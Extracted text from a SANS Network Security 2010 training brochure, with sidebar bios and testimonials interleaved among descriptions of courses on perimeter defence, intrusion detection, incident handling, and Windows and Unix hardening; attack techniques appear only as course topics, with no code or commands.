and often performs independent Topics: Malware; Microsoft Malware; External Tools and Analysis
security audits and assists internal 501.6 Hands On: Data Loss Prevention
audit groups to develop their Cyber security is all about managing, controlling, and mitigating risk to critical
assets, which in almost every organization are composed of data or information.
programs. James completed Perimeters are still important, but we are moving away from a fortress model and
his undergraduate studies at moving towards a focus on data. This is based on the fact that information no
longer solely resides on servers where properly configured access control
Philadelphia Biblical University lists can limit access and protect our information; it can now be copied Register at
and his graduate work at the to laptops and plugged into networks. Data must be protected no www.sans.org/
matter where it resides.
University of Maryland. He also
Topics: Risk Management; Data Classification; Digital Rights Management; network-security-2010
holds numerous professional Data Loss Prevention (DLP)
certifications.
September 19 - 29, 2010 47
SECURITY
502
• Information security officers 6 CPE Credits/Day • Laptop Required • Instructor: Dave Shackleford
• Intrusion analysts
• IT managers There is no single fix for securing your network.
• Network architects That’s why this course is a comprehensive analysis of a wide breadth of
technologies. This is probably the most diverse course in the SANS cata-
• Network security engineers log, as mastery of multiple security techniques are required to defend your
• Network and system administrators network from remote attacks. You cannot just focus on a single OS or security
appliance. A proper security posture comprises multiple layers. This course was
• Security managers developed to give you the knowledge and tools necessary at every layer to ensure
• Security analysts your network is secure.
• Security architects The course starts by looking at common problems: Is there traffic passing by my
firewall I didn’t expect? How did my system get compromised when no one can con-
• Security auditors nect to it from the Internet? Is there a better solution than anti-virus for controlling
malware? We’ll dig into these questions and more and answer them.
We all know how to assign an IP address, but to secure your network you really need
to understand the idiosyncrasies of the protocol. We’ll talk about how IP works and
how to spot the abnormal patterns. If you can’t hear yourself saying “Hummm, there
are no TCP options in that packet. It’s probably forged,” then you’ll gain some real
insight from this portion of the material.
Once you have an understanding of the complexities of IP, we’ll get into how to control
it on the wire. We focus on the underlying technology used by all of the projects rather
than telling you which are good and which are bad ones. A side-by-side product com-
parison is only useful for that specific moment in time. By gaining knowledge of what
goes on under the cover, you will be empowered to make good product choices for years
AUTHOR STATEMENT
to come. Just because two firewalls are stateful inspection, do they really work the same
One of the things I love seeing in my students on the wire? Is there really any difference between stateful inspection and network-
is the little light bulbs going on over their based intrusion prevention, or is it just marketing? These are the types of questions we
heads. I think a lot of people walk into the address in this portion of the course.
class thinking, “Hey I’ve been running a
We move on to a proper, wire-level assessment of a potential product, as well as what
PIX or Firewall-1 firewall for a few years – I
options and features are available. We’ll even get into how to deploy traffic control while
already know this perimeter stuff,” and they
avoiding some of the most common mistakes. Feel like your firewall is generating too
are blown away by how much they learn. A many daily entries for you to review the logs effectively? we’ll address this problem not
single line of defense was cool eight years by reducing the amount of critical data, but by streamlining and automating the back
ago. Today, attackers as well as their exploits end process of evaluating it.
are so sophisticated that a single line of
But you can’t do it all on the wire. A properly layered defense needs to include each indi-
security is no longer up to the task. In this
vidual host – not just the hosts exposed to access from the Internet, but hosts that have
class students learn about each layer that any kind of direct or indirect Internet communication capability as well. We’ll start with
can be implemented to keep the attackers OS lockdown techniques and move on to third party tools that can permit you to do any-
at bay. I’ve recently added to the course a thing from sandbox insecure applications to full-blown application policy enforcement.
ton of hands-on labs. Each technology really
Most significantly, I’ve developed this course material using the following guiding
helps to solidify the student’s comfort zone.
principles: Learn the process, not just one specific product; You learn more by doing
You learn about IDS and then immediately
so hands-on problem-solving is key; Always peel back the layers and identify the root
go hands-on with it in class. You learn about cause. While technical knowledge is important, what really matters are the skills to
vulnerability checking and again, set up properly leverage it. This is why the course is heavily
a scanner in class and start checking the focused on problem solving and root
reports. In many ways, this is probably cause analysis. While these are
the most difficult SANS class to master, as usually considered soft skills, they
the knowledge learned is so diverse. Each are vital to being an effective
technology is a required skill, however, if you role of security architect. So
are going to lock down your organization’s along with the technical training,
perimeter -Chris Brenton you’ll receive risk management
capabilities and even a bit of Zen
48 SANS Network Security 2010 GIAC Certification Cyber Guardian Program
September 19 - 29, 2010 empowerment. www.giac.org www.sans.org/cyber-guardian
Perimeter Protection In-Depth is suited for anyone wanting to become a firewall administrator
or perimeter designer. This course is also fantastic for auditors and consultants. Junior firewall
administrators earn from $35,000 to $55,000. More experienced firewall administrators can go up
to $90,000 or more. Consultants tend to earn 20 - 30% more than people with similar experience
levels working inside organizations if they can maintain a steady flow of work. Respected technical
certifications, like the GCFW and GCIA, can really help make a consultant stand out from the crowd.
502.1 TCP/IP for Firewalls

This first section is more than an executive overview as we dig down into the bits and bytes of the
problem. What can be secured at the network level, and which protection needs to be pushed back
to the hosts? What are my packet level control devices really doing on the wire, and when can’t
I trust them? If you want to control traffic on the wire, you have to understand the IP protocol. It
is for this reason a majority of the day is spent doing packet level analysis. While many protocol
analyzers will tell you what they think is happening, if you cannot read the decodes for yourself,
you will have no idea when the tool is leading you astray.
Topics: Common Threats; Windump/Tcpdump; OSI Layer 2; OSI Layer 3; Fragmentation; OSI Layer 4
through 6; IP Version 6 (IPv6)
502.2 Hands On: Firewalls, NIDS, and NIPS

The only way to understand if a network traffic control device is going to meet your requirements is to
Certified Instructor understand the technology underneath the hood. Do all stateful inspection firewalls handle traffic the same
Dave Shackleford way? Is there really any difference between a stateful inspection firewall and a network-based intrusion
prevention system (NIPS)? In today’s material we will cut through the vendor marketing slicks and look at what
Dave Shackleford, Director their products are really capable of doing.
Topics: Static Packet Filters; Stateful Packet Filters; Stateful Inspection Filtering; Intrusion Detection and Prevention;
of Security Assessments and Proxies; Cisco IOS
Risk & Compliance at Sword & 502.3 Hands On: Wire Products and Assessments
Shield Enterprise Security, is a In today’s material we will look at how each vendor has implemented the technology. We’ll also discuss how
to test these products on the wire so we know exactly how they are impacting traffic. Can the product stop
SANS Analyst, instructor and a covert communication channel using ICMP error packets? What about a source route attack? These are
the types of questions we’ll strive to answer in this material. The number one problem students have with
GIAC technical director. He has managing their environment is dealing with the firewall logs. Not only will we discuss what to look for, but
consulted with hundreds of through practical exercises you will learn how to optimize the log review process into something that takes less
time to finish than your morning coffee.
organizations in the areas of Topics: Commercial Traffic Control Products; Open Source Traffic Control Products; Building A Firewall Rulebase;
Perimeter Assessment; Firewall Log Analysis
regulatory compliance, security,
and network architecture and 502.4 Hands On: Host-Level Security
In the early days of the Internet it was possible to secure a network right at the perimeter. Modern-day attacks,
engineering. He’s worked as however, are far more advanced and require a multi-layered approach to security. This does not mean the
perimeter no longer serves a useful role; just that it is only part of the equation. Perimeter protection is only
CSO for Configuresoft, CTO for part of the equation. So today we focus on the security poster of our individual hosts, look at what the OS
vendors give us to work with and when we may need to turn to third party tools. It is not enough to simply
the Center for Internet Security, configure the hosts securely and hope for the best. So we will also look at vulnerability scanning and audits in
and has also worked as a order to be able to validate continuous integrity. When the worst occurs, we’ll talk about performing a forensic
analysis as well. Finally, we will talk about security information management. The devices on your network
security architect, analyst, and really want to tell you what is going on, but you have to be able to sort through all of the data. We’ll look at
options for both daily reports as well as real-time alerting.
manager for several Fortune Topics: Securing Hosts and Services; Host-Based Intrusion Detection and Prevention; Vulnerability Assessment and
500 companies. Auditing; Forensics; Security Information Management
502.5 Hands On: Securing the Wire

It’s not enough to control traffic flow; we also need to be able to secure the data inside of the packets. We will
start with the basics, authentication and encryption, and learn how these technologies are combined into the
modern day VPN. We’ll discuss which of the technologies have been proved to be mathematically secure and
“The expertise of the trainer which of them is a leap of faith. Further, we will discuss how to integrate encrypted dataflow into your overall
architecture design so you are not blinded to attacks through these encrypted tunnels. Then we turn our
is impressive, real life attention to securing the internal network structure. We’ll cover deploying wireless access points without
creating (yet another) point of management. We’ll also look at network access control (NAC) and
situations explained, discuss what it can do today as well as its potential in the future.
Topics: Authentication; Encryption; VPN’s, Wireless; Network Access Control
very good manuals.
Best training ever!” 502.6 Hands On: Perimeter Wrap-Up
The problems start off easy, like small organizations that need advice in order to make
-JERRY ROBLES DE MEDINA GODO CU their environment more secure. The complexity quickly escalates to where you need
to combine security, functionality, and political issues into the design. A healthy Register at
does of risk assessment is also thrown in for good measure. You will also
perform a series of labs that are hostile in nature. A majority of the previous
www.sans.org/
labs were geared towards problem solving. You will be presented with a network-security-2010
security issue and then given a hands-on process for resolving it.
Topics: Sizing Up A Network; Cool Tools SANS Network Security 2010
September 19 - 29, 2010 49
SECURITY
503
Who Should Attend
36 CPE Credits • Laptop Required • Instructor: Mike Poor
• Intrusion detection analysts
(all levels)
• Network engineers Learn practical, hands-on intrusion
• System, security, and network detection and traffic analysis from top
administrators practitioners/authors in the field.
• Hands-on security managers This is the most advanced network intrusion detection program that
has ever been taught. All of the course material is either new or just
updated to reflect the latest attack patterns. This series is jam-packed with
network traces and analysis tips. The emphasis is on increasing students’
understanding of the workings of TCP/IP and Hex, methods of network
traffic analysis, and one specific network intrusion detection system—
Snort. This course is not a comparison or demonstration of multiple NIDS.
Instead, the knowledge/information provided here allows students to better
understand the qualities that go into a sound NIDS and the “whys” behind
them, and thus, to be better equipped to make a wise selection for their site’s
particular needs.
This is a fast-paced course and students are expected to have a basic working
knowledge of TCP/IP (see: www.sans.org/training/tcpip_quiz.php) in order to
fully understand the topics that will be discussed. Although others may benefit,
this course is most appropriate for students who are or will become intrusion
AUTHOR STATEMENT
Guy Bruneau, Mike Poor, and I have detection analysts. Students generally range from novices with some TCP/IP
worked as intrusion analysts for many background all the way to seasoned analysts. The challenging, hands-on exercises
years. Over the years, we have seen our are specially designed for all experience levels. We strongly recommend that you
fair share of attacks and suspicious traffic
often leading to intrusions. Over time, spend some time getting familiar with TCPdump, WINdump, or another network
we have developed various analysis analyzer output before coming to class.
techniques that work on new detects, and
we have learned how to pass those on to “This class heightens your security
the students. Attendees will learn how PREREQUISITE
You must possess at least a working
awareness on protecting your
TCP/IP really works from instructors who
have spent thousands of hours analyzing, knowledge of TCP/IP and Hex. network and provides excellent
See www.sans.org/training/tcpip_quiz.php examples, in detail, on how to
researching, and categorizing suspicious
to test your TCP/IP and Hex basics knowledge.
traffic with a variety of security tools. accomplish this.”
You will learn from hundreds of old and
-LAURA FREEMAN, DND
current examples of detects that were
captured in the real world and be able to
apply these real-world examples to ana-
lyze known and new intrusion patterns.
We are confident that students will put
the training they receive from this course
into practice the day they get back to the
office. -Stephen Northcutt, Guy Bruneau,
and Mike Poor
Intrusion Detection In-Depth is one of our most advanced and challenging courses. People with
GCIA certifications have an advantage over other security job candidates and often land some of the
most interesting jobs in information security. Their salaries range from $50,000 to well into six figures.
503.1 TCP/IP for Intrusion Detection

Diligent students will be able to translate native hexadecimal at the IP, transport layers, and
be able to decode DNS. The material presented in this course will equip students with the
knowledge and understanding of TCP/IP and free tools like TCPdump and WINdump to assist
them in troubleshooting all types of networking complaints from routing problems to firewall
and critical server issues.
Topics: TCPdump Review; TCP/IP Communication Model; IP Fragmentation; ICMP; Stimulus and Response; Microsoft
Networking and Security; Domain Name System; Routing; IPSec; IPv6
503.2 Hands On – Part 1: Network Traffic Analysis Using TCPdump*

In the first day of this two-day module, students will learn how to interpret every single field
in a packet. We will build on that skill to learn traffic analysis with lab exercises to reinforce the
theory. TCPdump is the tool of choice selected to demonstrate the theory and is used in hands-
Senior Instructor on exercises. The intent of this course is to free the analyst from relying exclusively on the NIDS
Mike Poor to do packet interpretation.
Topics: Introduction to TCPdump; Writing TCPdump Filters; TCPdump Filters; Examining Datagram Fields with
Mike is a founder and senior TCPdump
security analyst for the DC firm

503.3 Hands On – Part 2: Network Traffic Analysis Using TCPdump*
InGuardians LLC. In his recent In this section of the class, we combine lectures with hands-on exercises to give you the
past life he has worked for foundation and knowledge to return to your site and use TCPdump to do real-world analysis of
your network traffic.
Sourcefire as a research engi-
Topics: Examining Datagram Fields with TCPdump; Analysis of TCPdump Output; Advanced Analysis
neer and for the SANS Institute
leading their intrusion analysis 503.4 Hands On: Intrusion Detection Snort Style*
On day four we will install, configure, and use the powerful and versatile freeware intrusion
team. As a consultant, Mike
detection system Snort in either Linux or Windows. In addition, you will learn to customize
conducts forensic analysis, Snort for many special uses. Hands-on exercises that will challenge both the novice and
penetration tests, vulnerability seasoned Snort user are included so that students will feel confident in their ability to effectively
utilize Snort for their site’s specific needs when they get back to the office.
assessments, security audits, and Topics: Introduction; Modes of Operation; Writing Snort Rules; Configuring Snort as an IDS; Output Analysis;
Advanced Topics
architecture reviews. His primary
job focus, however, is in intrusion 503.5 Hands On – Part 1: Security Information Management
detection, response, and mitiga- and Traffic Analysis*
tion. Mike currently holds both This day starts to bring together the knowledge gained on previous days to help you become a
combat ready analyst. You’ll learn how to assess and prioritize the events generated by an IDS/
GSEC and GCIA certifications and
IPS, including how to correlate events across multiple platforms and operating environments.
is an expert in network engi- You’ll participate in analyzing and decoding host and network logging data, identifying patterns
neering and systems, network, in attacker activity taken from live, hostile networks.
Topics: Traffic Patterns and Analysis; Interoperability and Standards in Intrusion Detection; Passive Analysis
and Web administration. Mike Techniques; IDS/IPS Architecture and Implementation Techniques; Common Analyst Tools; Event Correlation
and Common Attack Techniques
is an author of the international
best selling book Snort 2.1 from 503.6 Hands On – Part 2: Security Information Management and
Syngress and is a handler for the Traffic Analysis*
Internet Storm Center. On the final day, you will use all of the knowledge gained and be exposed to a barrage
of scans, reconnaissance techniques, and network exploits used by the attack
community. Hands-on participation in decoding and analyzing hostile activity
“This course is great for from a honeypot will prepare the student to assess IDS/IPS alerts and logging
information on their own network after completing this exercise.
network defenders as well
Topics: “The Challenge Hands-On Exercise,” Identifying Crafted Packets; Register at
as penetration testers to In-Depth Protocols Analysis; Common Errors and How to Avoid Them;
Advanced Analysis Profiling Techniques; Reducing False-Positives; www.sans.org/
understand some of what Identifying Denial-of-Service Activity
they are up against.”
-JAY BROWN, GD-IT *This course is available to Security 503 participants only.
September 19 - 29, 2010 51
SECURITY
504
Who Should Attend
36 CPE Credits • Laptop Required • Instructor: John Strand
• Incident handlers
• Leaders of incident handling teams
• System administrators who are If your organization has an Internet connection or
on the front lines defending their a disgruntled employee (and whose doesn’t!), your
systems and responding to attacks computer systems will get attacked.
• Other security personnel who are
From the five, ten, or even one hundred daily probes against your Internet
first responders when systems
come under attack infrastructure to the malicious insider slowly creeping through your most
vital information assets to the spyware your otherwise wholesome users
inadvertently downloaded, attackers are targeting your systems with
increasing viciousness and stealth.
By helping you understand attackers’ tactics and strategies in detail, giving
you hands-on experience in finding vulnerabilities and discovering intrusions,
and equipping you with a comprehensive incident handling plan, the in-
depth information helps you turn the tables on computer attackers. This
course addresses the latest cutting-edge insidious attack vectors, the ‘oldie-
but-goodie’ attacks that are still so prevalent, and everything in between.
Instead of merely teaching a few hack attack tricks, this course includes a
time-tested, step-by-step process for responding to computer incidents; a
detailed description of how attackers undermine systems so you can prepare,
detect, and respond to them; and a hands-on workshop for discovering holes
before the bad guys do. This workshop also includes the unique SANS Capture-the-
Flag event on the last day where you will apply your skills developed throughout
the session to match wits with your fellow students and instructor in a fun and
AUTHOR STATEMENT engaging learning environment. You’ll get to attack the systems in our lab and
My favorite part of teaching Hacker Tech-
capture the flags to help make the lessons from the whole week more concrete.
niques, Exploits, and Incident Handling
is watching students when they finally Additionally, the course explores the legal issues associated with responding to
“get it.” It’s usually a two-stage process. computer attacks, including employee monitoring, working with law enforcement,
First, students begin to realize how truly and handling evidence.
malicious some of these attacks are. Some
This challenging course is particularly well suited to individuals who lead or are
students have a very visceral reaction, oc-
casionally shouting out “Oh, shoot!” when a part of an incident handling team. Furthermore, general security practitioners,
they see what the bad guys are really up system administrators, and security architects will benefit by understanding how to
to. But if I stopped the process at that design, build, and operate their systems to prevent, detect, and respond to attacks.
point, I’d be doing a disservice. The second
stage is even more fun. Later in the class, It is imperative that you get written permission from the proper authority in your
students gradually realize that even organization before using these tools and techniques on your company’s system and also
though the attacks are really nasty, they that you advise your network and computer operations teams of your testing.
can prevent, detect, and respond to them.
Using the knowledge they gain in this
course, they know they’ll be ready when a
bad guy launches an attack against their
systems. And being ready to thwart the
bad guys is what it’s all about.
- Ed Skoudis
Hacker Techniques, Exploits, and Incident Handling is a challenging course particularly well
suited to individuals who lead or are a part of an incident handling team or are penetration testers or
RED TEAM members. It focuses on how to detect malicious code and how to respond. High-end incident
handlers and penetration testers earn top dollars for the industry.
504.1 Incident Handling Step-by-Step and Computer Crime

Investigation
This session describes a detailed incident handling process and applies that process to several in-
the-trenches case studies. Additionally, in the evening an optional ‘Intro to Linux’ mini-workshop
will be held. This session provides introductory Linux skills you’ll need to participate in exercises
throughout the rest of SEC504. If you are new to Linux, attending this evening session is crucial.
Topics: Preparation; Identification; Containment; Eradication; Recovery; Special Actions for Responding to Different
Types of Incidents; Incident Record Keeping; Incident Follow-Up
Certified Instructor 504.2 Hands On – Part 1: Computer and Network Hacker Exploits*
John Strand It is imperative that system administrators and security professionals know how to control
John Strand currently is the owner what outsiders can see. Students who take this class and master the material can expect
to learn the skills to identify potential targets and be provided tools they need to test their
and senior security researcher with systems effectively for vulnerabilities. This day covers the first two steps of many hacker attacks:
Black Hills Information Security, reconnaissance and scanning.
and a consultant with Argotek, Inc Topics: Reconnaissance; Scanning; Intrusion Detection System Evasion; Hands-on Exercises for a list of Tools
for TS/SCI programs. As a certified
SANS instructor he teaches: 504
504.3 Hands On – Part 2: Computer and Network Hacker Exploits*
Computer attackers are ripping our networks and systems apart in novel ways while constantly
“Hacker Techniques, Exploits and improving their techniques. This course covers the third step of many hacker attacks – gaining
Incident Handling,” 517, “Cutting access. For each attack, the course explains vulnerability categories, how various tools exploit
Edge Hacking Techniques,” and 560 holes, and how to harden systems or applications against each type of attack. Students who sign
an ethics and release form are issued a CD-ROM containing the attack tools examined in class.
“Network Penetration Testing.” He
Topics: Network-Level Attacks; Gathering and Parsing Packets; Operating System and Application-Level Attacks;
is a contributing author of Nagios 3 Netcat: The Attacker’s Best Friend; Hands-on Exercises with a list of tool Tools
Enterprise Network Monitoring, and
a regular contributor to Search-
Attackers aren’t resting on their laurels, and neither can we. They are increasingly targeting
Security’s “Ask the Expert” series
our operating systems and applications with ever-more clever and vicious attacks. This session
on the latest information security looks at increasingly popular attack avenues as well as the plague of denial of service attacks.
threats. He also regularly posts Topics: Password Cracking; Web Application Attacks; Denial of Service Attacks; Hands-on Exercises with a list of tools
videos demonstrating the latest
computer attacks and defenses
Once intruders have gained access into a system, they want to keep that access by preventing pesky
at vimeo.com/album/26207. He
system administrators and security personnel from detecting their presence. To defend against
started the practice of computer these attacks, you need to understand how attackers manipulate systems to discover the some-
security with Accenture Consulting times-subtle hints associated with system compromise. This course arms you with the understand-
ing and tools you need to defend against attackers maintaining access and covering their tracks.
in the areas of intrusion detection,
Topics: Maintaining Access; Covering the Courses; Five Methods for Implementing Kernel-Mode RootKits on
incident response, and vulnerability Windows and Linux; the Rise of Combo Malware; Detecting Backdoors; Hidden File Detection; Log Editing;
Covert Channels; Sample Scenarios
assessment/penetration testing.
John then moved on to Northrop 504.6 Hands On: Hacker Tools Workshop *
Grumman specializing in DCID 6/3 In this workshop you’ll apply skills gained throughout the week in penetrating various
PL3-PL5 (multi-level security solu- target hosts while playing Capture the Flag. Your instructor will act as your personal
tions), security architectures, and hacking coach, providing hints as you progress through the game and challenging
you to break into the laboratory computers to help underscore the lessons
program certification and accredita-
learned throughout the week. For your own attacker laptop, do not have
tion. He has a master’s degree from any sensitive data stored on the system. SANS is not responsible for your
Denver University and is currently system if someone in the class attacks it in the workshop. Bring the right
equipment and prepare it in advance to maximize what you’ll learn and
Register at
also a professor at Denver Univer- www.sans.org/
the fun you’ll have doing it.
sity. In his spare time he writes loud Topics: Capture the Flag Contest; Hands-on Analysis; General Exploits; network-security-2010
rock music and makes various futile Other Attack Tools and Techniques
attempts at fly-fishing. *This course is available to Security 504 participants only.

September 19 - 29, 2010 53
SECURITY
505
• Windows network security 6 CPE Credits/Day • Laptop Required • Instructor: Jason Fossen
engineers and architects
• Windows administrators with Will you be transitioning from Windows XP to
security duties
Windows 7?
• Anyone with Windows machines who
The Securing Windows course is fully updated for Windows Server
wants to implement the SANS 20
Critical Security Controls 2008-R2 and Windows 7. Most of the content applies to Windows
Server 2003 and XP too, but the focus is on 2008/Vista/7.
• Active Directory designers and
administrators Concerned about the 20 Critical Security Controls of the Consensus Audit
Guidelines? This course will help you implement the Critical Controls rel-
• Those who must enforce security
evant to Windows systems, not just audit them, and will walk you through
policies on Windows hosts
most of the tools step-by-step, too.
• Those deploying or managing a PKI or
As a Windows security expert, how can you stand out from the crowd and
smart cards
offer management more than the usual apply-this-checklist advice? Be
• IIS administrators and Web masters a security architect who understands the big picture. You can save your
with Web servers at risk organization money, maintain compliance with regulations, secure your
• Administrators who use the command networks, and advance your career all at the same time. How? By leverag-
line or scripting to automate their ing the Windows infrastructure you’ve already paid for.
duties and must learn PowerShell (the
This program is a comprehensive set of courses for Windows security ar-
replacement for CMD scripting and
chitects and administrators. It tackles tough problems like Active Directory
VBScript)
forest design, how to use Group Policy to lock down desktops, deploying
a Microsoft PKI and smart cards, pushing firewall and IPSec policies out to
every computer in the domain, securing public IIS Web servers, and Power-
Shell scripting.
PowerShell is the future of Windows scripting and automation. Easier to
learn and more powerful than VBScript, PowerShell is an essential tool for
automation and scalable management. If there is a one skill that will most
benefit the career of a Windows specialist, it’s scripting. Most of your compe-
tition lack scripting skills, so it’s a great way to make your resume stand out.
AUTHOR STATEMENT Scripting skills are also essential for being able to implement the 20 Critical
I’ve happily been with SANS for over a decade, Security Controls.
and the courses I write are always guided by You are encouraged to bring a virtual machine running Windows Server 2008
two questions: 1) What do administrators need Enterprise Edition configured as a domain controller, but this is not a require-
to know to secure their networks? and 2) What ment for attendance since the instructor will demo everything discussed on-
should administrators learn to advance their screen. You can get a free evaluation version of Server 2008 from Microsoft’s
careers as IT professionals? I’m not a Microsoft
Web site (just do a Google search on “site:microsoft.com Server 2008 trial”).
employee or a Microsoft-basher, so you won’t
You can use VMware, Virtual PC or any other virtual machine software.
get either kind of propaganda here; my concern
is with the health of your network and your This is a fun and fascinating course, a real eye-opener even for Windows admin-
career. As a security consultant I’ve seen it istrators with years of experience. Come see why there’s a lot more to Windows
all (good, bad, and ugly) and my experience security than just apply-
goes into the manuals I write for SANS and the ing patches and changing
stories I tell in seminar. The Securing Windows passwords; come see why a
course is packed with interesting and useful ad- Windows network needs a
vice which isn’t so easy to find on the Internet. security architect.
We always have a good time, so I hope to meet
you at the next conference! -Jason Fossen

Securing Windows is an advanced, focused course for system administrators with security
responsibilities. Senior system administrators earn from $45,000 to $90,000. Also, Windows auditors
with this level of system knowledge are highly sought after and earn salaries often 10 - 20% higher than
other auditors. This course picks up where MCSE training stops.
505.1 Securing Active Directory and DNS

On day one, we will quickly get you on top of what you need to know about Active Directory security
and delegation of authority. Importantly, this course is not an introduction to AD or an overview
of basic administration topics. This is a course for people who already manage AD, need to plan a
redeployment, or must lock down what they’ve got.
Topics: Securing Domain Controllers; Active Directory Access Control Lists; Delegation of Authority; Forest
Designs; Secure Dynamic DNS
505.2 Enforcing Critical Controls With Group Policy

In this course, we’ll see how to use Group Policy to lock down desktops and servers,
implement many of the SANS 20 Critical Controls, enforce regulatory compliance changes, configure
SANS Faculty Fellow services and applications, and scale our work out to thousands of systems conveniently. If you’ve
never seen Group Policy before, you’re in for a shock (a good shock!) and if you’ve been using Group
Jason Fossen Policy for years, this course should expand your understanding even more since the emphasis is on
Jason Fossen is a principal security, not Group Policy in general.
security consultant at Enclave Topics: Security Templates; What is Group Policy?; Fine-Tuning Group Policy; Updating Vulnerable Software; Pushing Out
Scripts; Enforcing Critical Controls
Consulting LLC, a published
author, and a frequent public
505.3 Windows PKI, EFS, and BitLocker
speaker on Microsoft security
Planning a PKI or data encryption project isn’t easy, and mistakes and redeployments can be costly,
issues. He is the sole author of so this day in part is designed to assist in the planning process to help avoid these mistakes. If you’re
the SANS’ week-long Securing not encrypting laptops and portable drives now, you will be soon, and BitLocker/EFS can save your
Windows course (SEC505), organization money while making the deployment relatively easy. Using Group Policy, you can
maintains the Windows day of manage most features of BitLocker and EFS on all your machines without having to configure each of
them by hand.
Security Essentials (SEC401.5),
Topics: Why Must I Have A PKI?; How To Install The Windows PKI; How To Manage Your PKI; Deploying Smart Cards;
and has been involved in Encrypting File System; BitLocker Drive Encryption
numerous other SANS’ proj-
ects since 1998. He graduated 505.4 Windows Firewall, IPSec, Wireless, and VPNs
from the University of Virginia, Day four is about how to use the Windows Firewall, IPSec, RADIUS, the RRAS VPN gateway service, and
WPA2 for 802.11 wireless to secure the network layer in our Windows environments. Virtually all these
received his master’s degree
client settings, including wireless settings, are manageable through Group Policy.
from the University of Texas at Topics: The New Windows Firewall; Why Use IPSec?; Creating IPSec Policies; RADIUS for Network Security; Virtual Private
Austin, and holds a number of Networking; Securing Wireless Networks
professional certifications. He
currently lives in Dallas, Texas.
505.5 Securing IIS 7.0
The demand for IIS security personnel is great because IIS is so widely deployed. This day focuses on IIS
Jason blogs about Windows
7.0 in Windows Server 2008, but many of the principles discussed will apply to IIS 6.0 as well. You won’t
Security Issues on the SANS be left out if you’re still running IIS 6.0. If you’re new to IIS 7.0, this course will get you up to speed.
Windows Security Blog. Topics: Server Hardening; XML Configuration System; IIS Authentication and Authorization; Web-Based Applications;
Logging and Auditing; FTP Over SSL (FTPS)
https://blogs.sans.org/windows
505.6 Windows PowerShell
To attend the course, you don’t have to bring a laptop, but if you do, get the latest version of
“The course introduced PowerShell from Microsoft (www.microsoft.com/powershell). A CD-ROM will be handed out
a wide range of by the instructor with sample scripts and other files with which to experiment. During
the course, we will walk through all the essentials of PowerShell together. The course
technologies and issues I presumes nothing, you don’t have to have any prior scripting experience to attend.
was completely unaware And, most importantly, be prepared to have fun: PowerShell is just plain
of- great exposure to new cooooooool.
Topics: What is PowerShell?; Cmdlets; Running Scripts; Namespace Providers; Piping Objects; Register at
ideas. Jason’s depth of Parameter Binding; Regular Expressions; Functions and Filters; The .NET Class
Library; Using Properties and Methods at the Command Line; Accessing COM www.sans.org/
knowledge and examples Objects: WMI, ADSI, ADO, etc.; Security and Execution Policy; And lots and lots
of sample scripts to walk through... network-security-2010
are of great value.”
-JEFF RUFF, AASKI TECHNOLOGIES
September 19 - 29, 2010 55
SECURITY
506 Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010

Who Should Attend 9:00am-5:00pm • 36 CPE Credits • Laptop Required
• Security professionals looking to Instructor: Hal Pomeranz
learn the basics of securing Unix
operating systems
Experience in-depth coverage of Linux and
• Experienced administrators looking
for in-depth descriptions of attacks Unix security issues.
on Unix systems and how they can be
prevented Experience in-depth coverage of Linux and Unix security issues.
Examine how to mitigate or eliminate general problems that apply
• Administrators needing information
on how to secure common Internet to all Unix-like operating systems including vulnerabilities in the
applications on the Unix platform password authentication system, file system, virtual memory system, and
• Auditors, incident responders, and applications that commonly run on Linux and Unix. This course provides
InfoSec analysts who need greater specific configuration guidance and practical, real-world examples, tips,
visibility into Linux and Unix security and tricks.
tools procedures, and best practices
Throughout this course, you will become skilled at utilizing freely available
tools to handle security issues, including SSH, AIDE, sudo, lsof, and many
others. SANS’ practical approach with “hands-on” exercises every day
ensures that you can start using these tools as soon as you return to work.
We will also put these tools to work in a special section that covers simple
Forensic techniques for investigating compromised systems.
Sampling of Topics
• Memory Attacks, Buffer Overflows • Server “lockdown” for Linux and Unix
• File System Attacks, Race Conditions • Controlling root access with sudo
• Trojan Horse Programs and Rootkits • SELinux and chroot() for application security
• Monitoring and Alerting Tools • DNSSEC deployment and automation
• Unix Logging and Kernel-Level Auditing • mod_security and Web Application Firewalls
• Building a centralized logging infrastructure • Secure Configuration of BIND, Sendmail, Apache
AUTHOR STATEMENT • Network Security Tools • Forensic Investigation
A wise man once said, “How are you going • SSH for Secure Administration
to learn anything if you know everything
already?” And yet there seems to be a quiet
arrogance in the Unix community that we’ve PREREQUISITE
figured out all of our security problems, as if to Students must possess at least a working knowledge of Unix.
say, “Been there, done that.” All I can say is that Most students who attend the track have a minimum of 3-5 years
what keeps me going in the Unix field, and the of Unix System Administration experience.
security industry in particular, is that there is
always something new to learn, discover, or in-
vent. In fifteen plus years on the job, what I’ve
learned is how much more there is that I can
learn. I think this is also true for the students
in my courses. I regularly get comments back
from students that say things like, “I’ve been
using Unix for 20 years and I still learned a lot
in this class.” That’s really rewarding.
- Hal Pomeranz

Securing Linux/Unix is an advanced, focused course for system administra-
tors with security responsibilities. Senior system administrators earn from
$45,000 to $90,000. Unix auditors with this level of system knowledge are highly
sought after. They can earn salaries often 10-20% higher than other auditors.
According to the “2003 IT Market Compensation Study,” IT organizations report
that ‘Skilled Unix Administrator’ is one of the two most difficult positions to fill.
506.1 Hands On: Common Issues and Vulnerabilities

This section provides in-depth coverage of Linux/Unix security issues with an overview of the most
common issues and vulnerabilities facing Unix security professionals both past and present. In
addition to analyzing each vulnerability and its associated risks, the course makes recommendations
on living with (or sometimes living without!) the given service. This is a full-disclosure course with
in-class demos of actual exploits and hands-on exercises to experiment with various examples of
malicious software.
Topics: Memory Attacks and Overflows; Remote Attacks; The Untrustworthy File System; Programmatic Attacks; Trojan
Horse Programs; Passwords Attacks; Physical Issues
506.2 Hands On – Part 1: Hardening Linux/Unix Systems

SANS Faculty Fellow This course is a simple step-by-step recipe for building a hardened Unix server platform. While
Hal Pomeranz focusing primarily on Linux and Solaris syntax, the course contains valuable lessons and strategies for
administrators of any Unix-like operating system. Students get a chance to practice these techniques
Hal is founder and CEO of
hands on using their own laptops.
Deer Run Associates, a systems Topics: Installation; Boot-Time Configuration; Kernel Tuning For Security; File System Access Control; Logging; User Access
Control; Warning Banners
management and security
consulting firm. He has spent
506.3 Hands On – Part 2: Hardening Linux/Unix Systems
more than 15 years managing This section takes a more in-depth look at additional tools required for hardening Linux and Unix
systems and networks for some operating systems. This includes Open Source tools, like AIDE and sudo, and host-based firewalls using
of the largest commercial, IP Tables and IP Filter. Syslog-NG will be introduced as a mechanism for creating a centralized logging
